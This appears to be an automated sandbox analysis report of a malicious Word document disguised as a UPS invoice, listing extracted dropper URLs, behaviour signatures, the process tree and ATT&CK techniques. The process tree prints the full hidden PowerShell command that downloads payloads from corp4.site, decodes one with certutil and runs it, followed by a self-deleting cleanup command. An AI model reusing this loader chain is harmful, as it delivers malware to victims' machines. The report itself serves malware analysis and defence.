Analysis

  • max time kernel
    129s
  • resource
    win7v191014
  • submitted
    11-12-2019 20:15

General

  • Target

    ups_invoice3105183.doc

  • Sample

    191211-xasqnnchds

  • SHA256

    0346971c0cf96bb3b143aea0e307f2d94af8a18474cc8e50dab4bcad965d2aa6

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://corp4.site/cVIka.dat

exe.dropper

http://corp4.site/vben.dat

exe.dropper

http://corp4.site/LugVP.dat

Signatures

  • Drops file in Windows directory 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Drops file in System32 directory 3 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Checks for installed software on the system 1 TTPs 34 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ups_invoice3105183.doc"
    1⤵
    • Drops file in System32 directory
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1992
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -windowstyle hidden -command Import-Module BitsTransfer; Start-BitsTransfer -Source http://corp4.site/cVIka.dat,http://corp4.site/vben.dat,http://corp4.site/LugVP.dat -Destination \"$env:TEMP\vido.com\",\"$env:TEMP\sfera\",\"$env:TEMP\LugVP.exe\"; Set-Location -Path \"$env:TEMP\"; certutil -decode sfera comport; Start-Process vido.com -ArgumentList comport
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    • Drops file in System32 directory
    • Suspicious use of AdjustPrivilegeToken
    PID:1956
    • C:\Windows\system32\certutil.exe
      "C:\Windows\system32\certutil.exe" -decode sfera comport
      2⤵
      • Drops file in Windows directory
      PID:1320
    • C:\Users\Admin\AppData\Local\Temp\vido.com
      "C:\Users\Admin\AppData\Local\Temp\vido.com" comport
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      • Suspicious use of SetThreadContext
      PID:912
      • C:\Users\Admin\AppData\Local\Temp\vido.com
        "C:\Users\Admin\AppData\Local\Temp\vido.com"
        3⤵
        • Suspicious use of WriteProcessMemory
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        PID:1924
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\vido.com"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2032
          • C:\Windows\SysWOW64\PING.EXE
            ping 127.0.0.1
            5⤵
            • Runs ping.exe
            PID:1320
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "184422301228799135618944460-322814422-178056611075657119908867499-803790831"
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:1972
  • C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
    "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
    1⤵
      PID:1240
    • C:\Windows\system32\conhost.exe
      \??\C:\Windows\system32\conhost.exe "1536848138253499463-163022004-15684493871335174701-10249533651716853959-2048248036"
      1⤵
      • Suspicious use of SetWindowsHookEx
      PID:1536

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    3
    T1012

    System Information Discovery

    1
    T1082

    Remote System Discovery

    1
    T1018

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\comport
    • memory/1924-15-0x00000000000C0000-0x000000000011D000-memory.dmp
      Filesize

      372KB

    • memory/1924-16-0x00000000000C0000-0x000000000011D000-memory.dmp
      Filesize

      372KB

    • memory/1992-0-0x0000000006260000-0x0000000006264000-memory.dmp
      Filesize

      16KB

    • memory/1992-5-0x0000000002020000-0x0000000002021000-memory.dmp
      Filesize

      4KB

    • memory/1992-6-0x0000000002020000-0x0000000002021000-memory.dmp
      Filesize

      4KB

    • memory/1992-7-0x0000000002020000-0x0000000002021000-memory.dmp
      Filesize

      4KB

    • memory/1992-11-0x00000000080B0000-0x00000000080B4000-memory.dmp
      Filesize

      16KB

    • memory/1992-12-0x00000000070B0000-0x00000000070B4000-memory.dmp
      Filesize

      16KB

    • memory/1992-13-0x0000000006260000-0x0000000006264000-memory.dmp
      Filesize

      16KB

    • memory/1992-14-0x00000000048D0000-0x00000000048D4000-memory.dmp
      Filesize

      16KB